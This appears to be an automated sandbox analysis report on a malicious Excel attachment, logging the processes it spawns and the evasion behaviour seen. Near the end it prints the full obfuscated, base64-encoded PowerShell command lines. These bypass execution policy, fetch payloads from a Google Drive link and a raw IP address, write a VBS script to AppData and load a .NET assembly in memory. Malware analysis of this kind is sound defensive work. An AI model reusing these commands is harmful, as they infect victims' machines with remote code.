      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: A & C Metrology OC 5457144.xlsStream path 'Workbook' entropy: 7.99864523402 (max. 8.0)
      Source: 54330000.0.drStream path 'Workbook' entropy: 7.99847056553 (max. 8.0)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE88F2314B rdtsc 5_2_000007FE88F2314B
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5370Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1668Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2925Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5075Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 774Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1409Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 942Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8893Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2474
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2246
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2206
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1340
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 399
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1552
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8958
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 833
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.dllJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mans504x\mans504x.dllJump to dropped file
      Source: C:\Windows\System32\mshta.exe TID: 3708Thread sleep time: -600000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3872Thread sleep time: -180000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3976Thread sleep time: -1844674407370954s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3848Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3904Thread sleep count: 2925 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3904Thread sleep count: 5075 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3952Thread sleep time: -120000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3956Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3932Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2844Thread sleep count: 774 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2844Thread sleep count: 1409 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1960Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1692Thread sleep count: 942 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1692Thread sleep count: 8893 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 808Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2560Thread sleep time: -10145709240540247s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2560Thread sleep time: -600000s >= -30000sJump to behavior
      Source: C:\Windows\System32\mshta.exe TID: 1964Thread sleep time: -480000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2180Thread sleep count: 2474 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2180Thread sleep count: 2246 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2372Thread sleep time: -180000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2380Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 896Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2992Thread sleep count: 2206 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2576Thread sleep count: 1340 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3456Thread sleep time: -3689348814741908s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3468Thread sleep time: -120000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3564Thread sleep count: 399 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3564Thread sleep count: 1552 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3888Thread sleep time: -60000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3944Thread sleep count: 8958 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3944Thread sleep count: 833 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3980Thread sleep time: -60000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4048Thread sleep time: -17524406870024063s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4048Thread sleep time: -2400000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE88F2314B rdtsc 5_2_000007FE88F2314B
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Yara detected Powershell download and execute
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 204, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTR
      Bypasses PowerShell execution policy
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNtJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS" Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES955D.tmp" "c:\Users\user\AppData\Local\Temp\td4qmpaq\CSC7C3FCBBFF452466CBE70AA6FD2E366A.TMP"Jump to behavior
